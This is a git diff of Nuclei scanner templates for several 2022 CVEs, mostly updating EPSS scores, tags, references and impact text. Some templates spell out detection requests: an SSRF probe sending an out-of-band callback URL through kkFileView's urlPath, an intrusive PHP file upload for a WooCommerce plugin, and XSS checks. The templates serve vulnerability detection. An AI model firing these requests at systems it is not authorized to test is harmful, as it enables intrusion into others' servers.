0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 @@ -14,12 +16,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43018 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.40565 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" tags: cve,cve2022,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,14 +35,13 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email= HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -50,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a00463044022037f2672c9d3f40fe1c475aba72b2b7a715a05dcaf7c74852c8259fb3d9b56ef7022049e93237d4d7b9f02e2381b97d9251f3f7ff608f1214edb5e5a4926275f7d60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4305.yaml b/nuclei-templates/CVE-2022/CVE-2022-4305.yaml index 93bcebef06..d8b5febff5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4305.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4305.yaml @@ -10,13 +10,14 @@ info: reference: - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd - https://nvd.nist.gov/vuln/detail/CVE-2022-4305 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4305 cwe-id: CWE-269 - epss-score: 0.04788 - epss-percentile: 0.91851 + epss-score: 0.04963 + epss-percentile: 0.92644 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: product: login_as_user_or_customer_\(user_switching\) framework: wordpress publicwww-query: /wp-content/plugins/login-as-customer-or-user - tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass + tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy http: - raw: @@ -44,4 +45,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and -# digest: 4a0a00473045022036db66899c57158fb4aef8d6eeadb799f9bb12778466302abc075b47b6d507680221008de6b55382749d49e5f7e81ef548f98309ef4b1e10106a23499fc678ee9aceba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4306.yaml b/nuclei-templates/CVE-2022/CVE-2022-4306.yaml index ea9e4509f7..af318067a5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4306.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4306.yaml @@ -6,17 +6,22 @@ info: severity: medium description: | WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.4. reference: - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe - https://nvd.nist.gov/vuln/detail/CVE-2022-4306 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-4306 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.32318 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +29,7 @@ info: vendor: panda_pods_repeater_field_project product: panda_pods_repeater_field framework: wordpress - tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated + tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project http: - raw: @@ -45,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "panda-repeater-add-new")' condition: and -# digest: 490a0046304402202ab2df88716a10554dbc0b0f3aba6dc49b3a6542ba12e4e385789dab2f947da602207faf9967535b680e87f4ced8e28edc1dfcf0ac4bf1a3317bcfba321cd1bd843b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d682dc0deb41b55d00a3fa9025b6e1d5ec6a980ea73308b00592db5f9c317eed022100bbb00e701c82b70533ae2125cbbe1ea9c19ba5ffe06aa67a1830a8d432c0fd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43140.yaml b/nuclei-templates/CVE-2022/CVE-2022-43140.yaml index d2c504ed63..e3e3d11b41 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43140.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43140.yaml @@ -18,31 +18,26 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.01954 - epss-percentile: 0.88673 + epss-score: 0.15211 + epss-percentile: 0.95316 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview - shodan-query: - - http.html:"kkFileView" - - http.html:"kkfileview" - fofa-query: - - app="kkFileView" - - app="kkfileview" - - body="kkfileview" + shodan-query: http.html:"kkFileView" + fofa-query: app="kkFileView" tags: cve2022,cve,ssrf,kkFileview,keking http: - method: GET path: - - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://{{interactsh-url}}')}}" + - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}" matchers: - type: word part: body words: - "

Interactsh Server

" -# digest: 4a0a00473045022017ef3e771c51d1d4f3306aa79fcccc291b263d020cbdd4b9b884010b9bf775f3022100af0e67bc1486df800715864fb143e17beab07d61c93127daacd3991c5a1cc9a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b810cd7135af4ac4280bcbb9a33af48834cfab8a8a104301dc1233773a645af5022100df9ffc099f882bc743890dc78cc2de64f4a92da50a2bd3d1bc9193d1dedd1f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43164.yaml b/nuclei-templates/CVE-2022/CVE-2022-43164.yaml index 2edb3f3372..0ee7cc148d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43164.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43164 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.003 + epss-percentile: 0.66367 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a004730450221008fd371ee45f32c482b25f58da816e6f4abb8981e2f2956787721c4b34a4175680220678586f005c089ccfbfac1a643ead73bb3985512909398074205fbbfa670c24d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220374b4e737a4fea8aa81413415c068ca4f57e725140e681a365c5fbfb01e99a5e02210083a924bcf9686759e21f03d28055d3ee09a2927940b21ea9c304314f32ab045e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43165.yaml b/nuclei-templates/CVE-2022/CVE-2022-43165.yaml index f195d869fe..2d5f2093c6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43165.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43165 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.00197 + epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -64,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a0048304602210086d2b1f1859fb325e2295eba49b7d68be6c60dc5ee22c2bc998a93201ccd0912022100f6dd41b70ace548f74cb157363587d5ce15fa0bc949cb5e33ff30110a6506954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43166.yaml b/nuclei-templates/CVE-2022/CVE-2022-43166.yaml index 82a72f0ad2..13fd099436 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43166.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43166.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.00197 + epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100d12f0e561d82f3a1df64d74745f2e6badb0f2bc278c3c95e24886a6632cf159a022100ad7270b453d47be45a764d3fac3d3f6132edc7030a2ef9ee7b93093dd1841a50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43167.yaml b/nuclei-templates/CVE-2022/CVE-2022-43167.yaml index 3fc8f26daf..87d4b73096 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43167.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43167.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43167 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.00197 + epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100b7c066e095870584ad20155d65ee2a43c319f761050a076fcb8248db27eb7f560220484316387fa51b7e2c287896988d65249bdbf65420fea5e430f99bdf39b16010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43169.yaml b/nuclei-templates/CVE-2022/CVE-2022-43169.yaml index c4d24c61ba..afbf5927fe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43169.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43169 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.003 + epss-percentile: 0.66367 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100bde82e2dd228e20185bf6fcef905f4964e7472766f4864c05b24a19b1aac2a08022074f35fb15d754d70e1f36a39de4fc5b514199e2f1f6e1c2e0c6711ccddfbe13c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ceebff44463a50c3f8cdfd03eb5a3449476a6d347a5014da85b0dc03d249e1dc02210089091f4d3daefd628b027f9ba865a756c4f31281aec45252b014c6653e2ebb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43170.yaml b/nuclei-templates/CVE-2022/CVE-2022-43170.yaml index c4efa6c3d7..9944fac2f6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43170.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43170.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43170 cwe-id: CWE-79 - epss-score: 0.16411 - epss-percentile: 0.95468 + epss-score: 0.26563 + epss-percentile: 0.96323 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022005f1af9dc3b38edda441d678488aa6470220fb09eae3db729c2ce5ed35b7502f022100b2dd41a53a9dc73eb66b5e4efca0717d348b8c5378cfdf6d44c639f5bfdb438e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050159dcb3305abbac67f828aa26ed8c27682f0fab2c0ebe28a29cbbaf8adb450022065e31b15fafe74e1177ad1e2787cf1d8483181eae49e031828eb791e6640e622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43185.yaml b/nuclei-templates/CVE-2022/CVE-2022-43185.yaml index b54ba825a1..ca6731f209 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43185.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43185.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43185 cwe-id: CWE-79 - epss-score: 0.34373 - epss-percentile: 0.96682 + epss-score: 0.45754 + epss-percentile: 0.97082 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +63,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100b27d125f405b692ffbd2baa49bf4da10d90267cb464f73ce5f53159bc18a332102205e8f62906a36299acb494b3f52a82b58d6dec6b427edd0bc947bc66fc734ae4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc300fd32b6adf7bc6aac4589f0eb432976dd5e3e894c339bb71185d1b37c6da022043adf86185cdd562f52a3f7407dbe76cf38ac54c42fb933cbf55a15ed9a3b952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4320.yaml b/nuclei-templates/CVE-2022/CVE-2022-4320.yaml index 9b91ffc76b..5686e82340 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4320.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4320.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.5. reference: - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c @@ -15,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4320 cwe-id: CWE-79 - epss-score: 0.00083 - epss-percentile: 0.34683 + epss-score: 0.00092 + epss-percentile: 0.3872 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: mhsoftware product: wordpress_events_calendar_plugin framework: wordpress - tags: calendar,event,xss,wordpress,wp,wp-plugin,cve,cve2022,wpscan + tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware http: - method: GET @@ -53,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6b7323b7052c23d91d0d26a227f3ad02500d0fccc27b6e0d079b6fb33a43bdb022100a281d4a730045eca39a056b6eba00e2b10571f044afef207d1b6d2f102257629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220754824a39c96f4cf434e9eb86e0a47441d3e9724d05ac3bd63ca2c7d54c20270022100d913f8ee7c703312dd076bb9fa9fac645bd47d3e8ab78d97ee9e0fa071909843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4321.yaml b/nuclei-templates/CVE-2022/CVE-2022-4321.yaml index 5d1060919a..4ee1172954 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4321.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4321.yaml @@ -6,18 +6,22 @@ info: severity: medium description: | The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website. remediation: Fixed in version 1.1.2 reference: - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644 - https://nvd.nist.gov/vuln/detail/CVE-2022-4321 - https://wordpress.org/plugins/pdf-generator-for-wp/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/kwalsh-rz/github-action-ecr-scan-test classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4321 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00078 + epss-percentile: 0.32646 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +30,7 @@ info: product: pdf_generator_for_wordpress framework: wordpress publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" - tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp + tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: - method: GET @@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c616630fce360c35973f0d8143abf10f0ff9e96aa40d9d1fb78fd54f3c788bc8022032cdabefdc12a744db45747128ae8e5fd985999f0b6de3145efc8aa0f01397e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4325.yaml b/nuclei-templates/CVE-2022/CVE-2022-4325.yaml index 188321a7eb..886fb93b0c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4325.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4325.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.10.1. reference: - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395 @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4325 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: ifeelweb product: post_status_notifier_lite framework: wordpress - tags: wp,wordpress,wpscan,authenticated,cve,cve2022,xss,wp-plugin,post-status-notifier-lite + tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Post Status Notifier Lite")' condition: and -# digest: 4a0a0047304502202289158039225f6a91d723ebe3f2606c09e335a5463ecd357fd4afdb0c99aebb022100fabfa1873a8493836dd2c0f1564c582e44415da1d98a0470656a8d4eafee4e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205206499c7d6a2bedfe29a673b7c4c487f6357884ab5336b30c33d3f7116b4bfd02202e13bd6b2db15b9f638ba8688c91867f9730b8e4efa5df27dbf609ff6a0196f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4328.yaml b/nuclei-templates/CVE-2022/CVE-2022-4328.yaml index e92034dfe4..4d2163544c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4328.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4328.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4328 cwe-id: CWE-434 - epss-score: 0.45141 - epss-percentile: 0.97044 + epss-score: 0.22681 + epss-percentile: 0.96077 cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,10 @@ info: vendor: najeebmedia product: woocommerce_checkout_field_manager framework: wordpress - tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive + tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload + +variables: + string: "CVE-2022-4328" http: - raw: @@ -38,7 +41,7 @@ http: Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream - + --------------------------22728be7b3104597-- - | @@ -48,16 +51,7 @@ http: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - fe5df26ce4ca0056ffae8854469c282f - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022100d4dc1e0840817fa309cbe05b8e408819a44b0d3e083341e8c6e10398850d712702203c2004ec1a5ffc72ebb64f95b1542f9061860e9fc0a43202ed1dd50009ac72c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '{{md5(string)}}' +# digest: 4b0a00483046022100db4a0f639753de0386e0d6f256fdf6e31797f887c3f67051f67f03ff12021437022100e2072c64127d9242a4900aa37c32949d284a94fa2f241e66d10828e56cf2acbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43769.yaml b/nuclei-templates/CVE-2022/CVE-2022-43769.yaml index 68d2df540d..b51fa0f7e1 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43769.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43769.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. reference: - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769- @@ -16,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.27382 - epss-percentile: 0.96307 + epss-score: 0.33038 + epss-percentile: 0.96634 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 - tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev + tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi http: - method: GET @@ -48,4 +50,4 @@ http: part: header words: - "application/json" -# digest: 